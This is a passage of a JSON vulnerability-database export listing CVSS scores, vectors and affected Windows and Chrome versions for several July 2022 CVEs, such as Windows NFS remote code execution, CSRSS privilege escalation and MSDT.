{"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-12T23:15:00", "type": "prion", "title": "Remote code execution", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30221"], "modified": "2023-05-17T17:15:00", "id": "PRION:CVE-2022-30221", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-30221", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-20T23:23:49", "description": "Windows Network File System Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T23:15:00", "type": "prion", "title": "Remote code execution", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22039"], "modified": "2023-08-08T14:22:00", "id": "PRION:CVE-2022-22039", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-22039", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-11-20T23:23:49", "description": "Windows Network File System Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T23:15:00", "type": "prion", "title": "Remote code execution", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22029"], "modified": "2023-08-08T14:22:00", "id": "PRION:CVE-2022-22029", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-22029", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-20T23:23:51", "description": "Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T23:15:00", "type": "prion", "title": "Privilege escalation", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047"], "modified": "2023-08-08T14:21:00", "id": "PRION:CVE-2022-22047", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-22047", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-20T23:23:49", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T23:15:00", "type": "prion", "title": "Remote code execution", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22038"], "modified": "2023-08-08T14:22:00", "id": "PRION:CVE-2022-22038", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-22038", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-20T23:25:26", "description": "Heap buffer overflow in WebRTC in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2022-07-28T02:15:00", "type": "prion", "title": "Heap overflow", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2294"], "modified": "2022-11-29T15:54:00", "id": "PRION:CVE-2022-2294", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-2294", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-20T23:36:26", "description": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T20:15:00", "type": "prion", "title": "Remote code execution", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-08-08T14:22:00", "id": "PRION:CVE-2022-30190", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-30190", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-20T23:25:27", "description": "Type confusion in V8 in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2022-07-28T02:15:00", "type": "prion", "title": "Type confusion", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2295"], "modified": "2022-10-26T14:05:00", "id": "PRION:CVE-2022-2295", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-2295", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-12-06T15:44:52", "description": "Windows Graphics Component Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-12T23:15:00", "type": "cve", "title": "CVE-2022-30221", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30221"], "modified": "2023-05-17T17:15:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2022-30221", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-30221", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:05:50", "description": "Windows Network File System Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T23:15:00", "type": "cve", "title": "CVE-2022-22039", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22039"], "modified": "2023-08-08T14:22:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2022-22039", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22039", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:05:52", "description": "Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T23:15:00", "type": "cve", "title": "CVE-2022-22047", "cwe": ["CWE-426"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047"], "modified": "2023-08-08T14:21:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2022-22047", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22047", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:05:47", "description": "Windows Network File System Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T23:15:00", "type": "cve", "title": "CVE-2022-22029", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22029"], "modified": "2023-08-08T14:22:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2022-22029", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22029", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:05:50", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T23:15:00", "type": "cve", "title": "CVE-2022-22038", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22038"], "modified": "2023-08-08T14:22:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2022-22038", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22038", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", 